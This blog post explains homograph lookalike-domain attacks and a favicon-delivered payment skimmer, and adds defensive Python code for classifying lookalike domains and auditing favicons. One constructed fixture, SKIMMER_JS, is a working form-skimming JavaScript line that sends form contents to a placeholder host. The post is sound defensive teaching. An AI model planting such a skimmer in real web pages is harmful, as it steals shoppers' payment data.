Network Solutions blog: How to Recognize and Prevent Homograph Attacks

In a previous post, we discussed ways that IT managers can prevent brandjacking of their domains and their businesses. That post has plenty of good advice, but there is another dimension to brandjacking: criminals can use homoglyph or homograph attacks. These are also called internationalized domain name (IDN) attacks or punycode attacks. Whatever the exact name, the idea behind them is simple to explain with a bit of Internet history.

When the Internet was first created, domain names could only use the Latin alphabet: the letters a to z, the digits 0 to 9 and the hyphen. That character set covers many of the world's languages, but not all of them. As the Internet expanded across the globe, it connected countries where other writing systems are in use: think of Arabic script or Chinese characters.


So the internationalized domain name (IDN) standards were created to handle non-Latin characters in domains and URLs. Under the hood, a label that contains non-Latin characters is converted to an ASCII form called punycode, and you can recognize such a label because it begins with the letters "xn--" (the ACE prefix), which signal that encoded non-Latin characters follow. This is useful because you don't want to force everyone whose language uses another writing system to learn the Latin alphabet just to type a web address.


The trouble is that many of these characters look very similar to the Latin ones that you and I use in English. For example, the lowercase Cyrillic "а" (U+0430) looks exactly like the lowercase Latin "a" (U+0061), yet to the DNS they are entirely different domains. Scammers registered domains that looked just like an all-Latin brand name, with one or more letters swapped for lookalikes from another script. In 2017 a researcher demonstrated this ploy with "xn--80ak6aa92e.com", a domain made entirely of Cyrillic letters that the browsers of the day rendered as "apple.com", and since then the major browsers have been updated to show the punycode form in the address bar whenever a label looks like a cross-script lookalike. Go ahead, paste the term into your browser's URL bar: what you will see is the "xn--" string, not a convincing "apple.com". But back in the day, this would bring up what looked like the ordinary Apple webpage, cleverly copied by some scammer to fool the unsuspecting user.


Homograph attacks differ from ordinary typosquatting, where domains such as googel.com are registered by spammers to catch hurried typists who don't check their work. Some browsers now warn about, or suggest a correction for, a domain that is one keystroke away from a well-known site, by the way. Isn't it nice that we have some smart coders who can figure out our foibles? (That is a rhetorical question, don't answer it.)
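To make the mechanics concrete, here is an added example (not code from the Network Solutions post) that encodes and decodes IDN labels with Python's standard punycode codec and applies the kind of checks a browser or a brand-monitoring script runs on a candidate domain: a Latin "skeleton" built from a small constructed table of Cyrillic lookalikes, a mixed-script test, and an edit distance that also catches typosquats such as googel.com. The brand list, the confusables table and the `login-apple` sample domain are assumptions for the example; a real deployment would load the full Unicode confusables data.

```python
import unicodedata

# Brands to protect; constructed list for this example.
BRANDS = {"apple.com", "google.com"}

# Cyrillic letters that render like Latin ones (a constructed subset of the
# Unicode confusables data; a real deployment would load the full table).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u04cf": "l",
}


def to_ace(domain):
    """Encode a domain the way a resolver sees it: every non-ASCII label becomes
    Punycode (RFC 3492) behind the 'xn--' ACE prefix; ASCII labels pass through."""
    out = []
    for label in domain.split("."):
        if label.isascii():
            out.append(label.lower())
        else:
            out.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(out)


def from_ace(domain):
    """Reverse of to_ace: decode any xn-- label back to its Unicode form."""
    out = []
    for label in domain.split("."):
        if label.lower().startswith("xn--"):
            out.append(label[4:].encode("ascii").decode("punycode"))
        else:
            out.append(label)
    return ".".join(out)


def scripts_in(label):
    """Scripts used by the letters of a label, approximated by the first word of
    each character's Unicode name ('CYRILLIC SMALL LETTER A' -> 'CYRILLIC')."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def skeleton(domain):
    """Replace every confusable letter with its Latin lookalike, so a homograph
    collapses onto the brand it imitates."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in domain)


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute or swap two
    adjacent characters, one unit each (so googel -> google costs 1)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(domain, brands=BRANDS):
    """Label a domain (Unicode or xn-- form) as 'brand', 'homograph',
    'mixed-script', 'typosquat' or 'ok'."""
    name = from_ace(domain).lower()
    if name in brands:
        return "brand"
    if skeleton(name) in brands:
        return "homograph"
    if any(len(scripts_in(label)) > 1 for label in name.split(".")):
        return "mixed-script"
    if any(osa_distance(name, brand) == 1 for brand in brands):
        return "typosquat"
    return "ok"


if __name__ == "__main__":
    samples = ["apple.com", "xn--80ak6aa92e.com", "googel.com",
               "\u04cfogin-apple.com", "example.org"]   # constructed inputs
    for d in samples:
        print(f"{d:22} -> {from_ace(d):18} {classify(d)}")
```

The script test is deliberately strict: a Japanese label legitimately mixes hiragana, katakana and kanji, which is why browsers keep an allowlist of script combinations rather than flagging every mix. Python's `str.encode("idna")` performs the same Punycode step after normalizing the label, which is what a browser does before it resolves the name.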

New Homograph Attacks Discovered


Most security researchers figured the homograph problem was solved, but of course in the cat-and-mouse world of malware it is only a matter of time before something tips the balance back in favor of the attackers. This was the case with a recent discovery by Malwarebytes of the Inter skimming kit being delivered through a site's favicon, combined with a lookalike domain.


Favicons are the small icons that a browser shows on a tab, in the bookmarks list and in the history; older browsers also drew them next to the URL in the address bar. Most people never look at them closely, but you can load one directly by requesting its URL, as with Google's colorful G. They used to serve as a rough indicator that you were browsing the site you expected, but because anyone can copy an icon, browsers now rely on more sophisticated checks and the favicon has fallen out of favor as a trust signal.


The latest ploy is to use the .ico file that supplies a site's favicon as the delivery vehicle for a piece of malware. This is what Malwarebytes found. It is a more sophisticated injection attack: the response to the request for the tiny icon carries code that hooks into the website. The goal of this attacker is to abuse a payment webpage and steal your credit card data. The researchers tracked several domains that were using the hacked favicon to gain access to various ecommerce sites. We covered skimming and eCommerce in an earlier post.

Fortunately, this story has a happy ending: once the researchers figured out the attack sequence, they contacted the domain owners to warn them, and found that the owners had already discovered the skimmer and removed the code. What this shows, however, is the lengths to which adversaries will go to compromise your websites, how you need to be on the lookout for anything suspicious, and how the online criminal world continues to evolve and find ways around our defenses.


There is an important lesson here for IT professionals: be on the lookout for injection-style attacks across your web infrastructure. Every element of your webpages can be compromised, even rarely-inspected tiny icon files.
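As an added example of the kind of check that lesson calls for (not code from the post or from Malwarebytes), the script below parses a page for its declared favicons, flags any icon served from a host other than the page's own, and then inspects the bytes actually returned at each icon URL: an icon should start with an ICO or PNG header, should contain nothing that looks like JavaScript, and should hash to the value recorded when the site was deployed. The page HTML, the hosts `shop.example`, `icons.example` and `collect.example`, the icon bytes and the skimmer-like response are all constructed for the example; in practice the `served` bytes come from fetching each URL, ideally once more with a checkout-page Referer, since a skimmer may only be delivered to payment pages.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

ICO_MAGIC = b"\x00\x00\x01\x00"          # Windows icon header: reserved=0, type=1
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Crude markers of JavaScript where only image bytes should be.
SCRIPT_MARKERS = re.compile(rb"function\s*\(|document\.|window\.|<script|eval\(", re.I)


class IconLinkParser(HTMLParser):
    """Collect the href of every <link rel="...icon..."> in a page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = dict(attrs)
        rel = (a.get("rel") or "").lower().split()
        if a.get("href") and any("icon" in token for token in rel):
            self.hrefs.append(a["href"])


def icon_urls(page_url, html):
    """Absolute URLs of all favicons a page declares, in document order."""
    parser = IconLinkParser()
    parser.feed(html)
    return [urljoin(page_url, href) for href in parser.hrefs]


def check_icon_body(body, expected_sha256=None):
    """Findings for the bytes actually served at a favicon URL."""
    findings = []
    if not (body.startswith(ICO_MAGIC) or body.startswith(PNG_MAGIC)):
        findings.append("not an ICO/PNG image")
    if SCRIPT_MARKERS.search(body):
        findings.append("contains JavaScript-like content")
    if expected_sha256 and hashlib.sha256(body).hexdigest() != expected_sha256:
        findings.append("hash differs from baseline")
    return findings


def audit_icons(page_url, html, served, baselines):
    """Map each declared favicon URL to a list of findings (empty means clean).

    served:    icon URL -> bytes the server returned for it
    baselines: icon URL -> SHA-256 hex of the icon as originally deployed
    """
    report = {}
    for url in icon_urls(page_url, html):
        findings = []
        if urlparse(url).hostname != urlparse(page_url).hostname:
            findings.append("served from a third-party host")
        findings += check_icon_body(served.get(url, b""), baselines.get(url))
        report[url] = findings
    return report


# --- Constructed sample data (hypothetical hosts, not from the original post) ---
PAGE_URL = "https://shop.example/checkout"
PAGE_HTML = """<html><head>
<link rel="icon" href="/favicon.ico">
<link rel="shortcut icon" href="https://icons.example/shop.ico">
</head><body>...</body></html>"""

# A minimal-looking ICO header followed by padding; enough for the magic check.
GOOD_ICO = ICO_MAGIC + b"\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00" + b"\x00" * 32
# What a skimmer-serving "icon" URL might return instead of an image (constructed).
SKIMMER_JS = (b"(function(){var f=document.querySelector('form');"
              b"f.addEventListener('submit',function(){new Image().src="
              b"'https://collect.example/?d='+btoa(f.innerHTML);});})();")

SERVED = {
    "https://shop.example/favicon.ico": GOOD_ICO,
    "https://icons.example/shop.ico": SKIMMER_JS,
}
BASELINES = {"https://shop.example/favicon.ico": hashlib.sha256(GOOD_ICO).hexdigest()}

if __name__ == "__main__":
    for url, findings in audit_icons(PAGE_URL, PAGE_HTML, SERVED, BASELINES).items():
        print(url, "->", findings or ["ok"])
```

The hash baseline is the decisive test; the magic-byte and script-marker checks exist for icons you have no baseline for and will miss a skimmer hidden inside a structurally valid image. Record the baseline from your deployment artifacts, not from a live fetch, or you will baseline the compromised file.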
